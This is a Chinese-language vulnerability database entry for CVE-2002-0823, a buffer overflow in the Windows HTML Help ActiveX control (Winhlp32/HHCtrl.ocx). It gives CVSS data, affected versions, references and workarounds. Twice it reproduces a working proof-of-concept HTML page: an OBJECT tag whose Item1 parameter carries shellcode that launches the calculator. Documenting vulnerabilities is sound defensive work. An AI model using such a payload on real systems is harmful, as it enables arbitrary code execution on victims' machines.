CVE-2002-0823
CVSS7.5
发布时间 :2002-08-12 00:00:00
修订时间 :2016-10-17 22:22:11
NMCOES    

[原文]Buffer overflow in Winhlp32.exe allows remote attackers to execute arbitrary code via an HTML document that calls the HTML Help ActiveX control (HHCtrl.ocx) with a long pathname in the Item parameter.


[CNNVD]Microsoft Windows HTML帮助ActiveX控件多个缓冲区溢出漏洞(CNNVD-200208-234)

        
        HTML帮助ActiveX控件(Hhctrl.ocx)由Microsoft HTML Help附带,设计用于与Internet Explorer一起提供帮助功能。
        HTML帮助ActiveX控件存在漏洞,可导致远程攻击者进行拒绝服务攻击。
        HTML帮助ActiveX控件存在基于栈和堆的缓冲区溢出,攻击者可以构建包含恶意数据的Web页面,当用户浏览此链接时,可导致拒绝服务攻击,精心构建提交数据可导致以SYSTEM的权限在客户端系统上执行任意命令。
        在Microsoft提供补丁之后,NGSSoftware将提供详细技术细节。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/a:microsoft:windows_helpMicrosoft winhlp32
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0823
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0823
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-234
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=102822806329440&w=2
(UNKNOWN)  BUGTRAQ  20020801 Winhelp32 Remote Buffer Overrun
http://support.microsoft.com/default.aspx?scid=kb;en-us;q293338
(VENDOR_ADVISORY)  MSKB  Q293338
http://www.iss.net/security_center/static/9746.php
(UNKNOWN)  XF  htmlhelp-item-bo(9746)
http://www.securityfocus.com/bid/4857
(UNKNOWN)  BID  4857

- 漏洞信息

Microsoft Windows HTML帮助ActiveX控件多个缓冲区溢出漏洞
高危 边界条件错误
2002-08-12 00:00:00 2006-04-19 00:00:00
远程  
        
        HTML帮助ActiveX控件(Hhctrl.ocx)由Microsoft HTML Help附带,设计用于与Internet Explorer一起提供帮助功能。
        HTML帮助ActiveX控件存在漏洞,可导致远程攻击者进行拒绝服务攻击。
        HTML帮助ActiveX控件存在基于栈和堆的缓冲区溢出,攻击者可以构建包含恶意数据的Web页面,当用户浏览此链接时,可导致拒绝服务攻击,精心构建提交数据可导致以SYSTEM的权限在客户端系统上执行任意命令。
        在Microsoft提供补丁之后,NGSSoftware将提供详细技术细节。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 改名或者删除HTML帮助ActiveX控件(Hhctrl.ocx)并关闭Active脚本。
        厂商补丁:
        Microsoft
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.microsoft.com/technet/

- 漏洞信息 (21485)

Microsoft Windows 95/98/2000/NT4 WinHlp Item Buffer Overflow Vulnerability (EDBID:21485)
windows remote
2002-05-27 Verified
0 Next Generation Security
N/A [点击下载]
source: http://www.securityfocus.com/bid/4857/info

HTML Help ActiveX control (Hhctrl.ocx) ships as part of Microsoft HTML Help and is designed to work with Internet Explorer to provide functionality for help systems.

A remotely exploitable issue has been reported in the WinHlp facility. The software fails to perform sufficient boundary checks of the Item parameter in the WinHlp command. This issue resides in Winhlp32.exe.

An attacker can exploit this condition by embedding a call to the vulnerable ActiveX control in a malicious webpage or HTML email. If successful, the attacker may be able to execute arbitrary code on the client system as the Internet Explorer user.

Note that Windows ships with HTML Help.

The HTML Help ActiveX control can also reportedly be used to mount denial-of-service attacks and exploit other stack- and heap-based overflows.

Tiny Personal Firewall 3.0 reportedly treats the HTML Help facility as a trusted application in the default configuration. As a result, any outgoing/back-channel connections that stem from successful exploits will not be blocked by the firewall in the default configuration. Note that this issue is reportedly not present in Tiny Personal Firewall 2.0. 

<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
VALUE="WinHelp"><PARAM NAME="Item1"
VALUE="^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð3�Phcalc^Í4$&#402;�&#1;PV¸¯§éw^?Ð3�P¾&#8221;^Ïéw^?�AAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
PPPQQQQRRRRSSSSTTTAAAA&#11;©õwABCDEFGH^Ð&#402;�&#21;^?ægMyWindow"><PARAM
NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT> 		

- 漏洞信息

2991
Microsoft WinHlp Active-X Item Parameter Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Microsoft Windows ships with an HTML Help ActiveX control that allows a remote attacker to execute arbitrary code on a vulnerable system. The flaw is due to insufficient bounds checking of the "Item" parameter in the Winhlp32.exe file. By creating a malicious HTML document that calls the vulnerable ActiveX control, the attacker could execute arbitrary code.

- 时间线

2002-04-02 Unknow
2002-04-02 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Rename of delete the HTML Help ActiveX Control file hhctrl.ocx and disable active scripting.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft Windows WinHlp Item Buffer Overflow Vulnerability
Boundary Condition Error 4857
Yes No
2002-05-27 12:00:00 2007-11-01 09:56:00
Vulnerability discovery credited to Next Generation Security Software.

- 受影响的程序版本

Microsoft Windows XP Professional
Microsoft Windows XP Home
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows ME
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
+ Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Datacenter Server SP1
+ Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server

- 漏洞讨论

HTML Help ActiveX control (Hhctrl.ocx) ships as part of Microsoft HTML Help and is designed to work with Internet Explorer to provide functionality for help systems.

A remotely exploitable issue has been reported in the WinHlp facility. The software fails to perform sufficient boundary checks of the Item parameter in the WinHlp command. This issue resides in Winhlp32.exe.

An attacker can exploit this condition by embedding a call to the vulnerable ActiveX control in a malicious webpage or HTML email. If successful, the attacker may be able to execute arbitrary code on the client system as the Internet Explorer user.

Note that Windows ships with HTML Help.

The HTML Help ActiveX control can also reportedly be used to mount denial-of-service attacks and exploit other stack- and heap-based overflows.

Tiny Personal Firewall 3.0 reportedly treats the HTML Help facility as a trusted application in the default configuration. As a result, any outgoing/back-channel connections that stem from successful exploits will not be blocked by the firewall in the default configuration. Note that this issue is reportedly not present in Tiny Personal Firewall 2.0.

- 漏洞利用

The following proof-of-concept code will open the calculator on the client system:

<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
VALUE="WinHelp"><PARAM NAME="Item1"
VALUE="^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð3�Phcalc^Í4$&#402;�&#1;PV¸¯§éw^?Ð3�P¾&#8221;^Ïéw^?�AAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
PPPQQQQRRRRSSSSTTTAAAA&#11;©õwABCDEFGH^Ð&#402;�&#21;^?ægMyWindow"><PARAM
NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- 解决方案

** IMPORTANT NOTE: The discoverer of this issue has reported that it has been fixed in Microsoft Windows 2000 SP3. Symantec has not been able to identify this specific issue in the list of those addressed by this Service Pack. However, SP3 addresses a number of other issues, so administrators are advised to apply it as soon as possible.

**** There have been reports that this issue is not in fact resolved in Microsoft Windows 2000 SP3.


Microsoft Windows 2000 Server SP2

Microsoft Windows 2000 Advanced Server SP2

Microsoft Windows 2000 Professional SP2

Microsoft Windows 2000 Datacenter Server SP2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站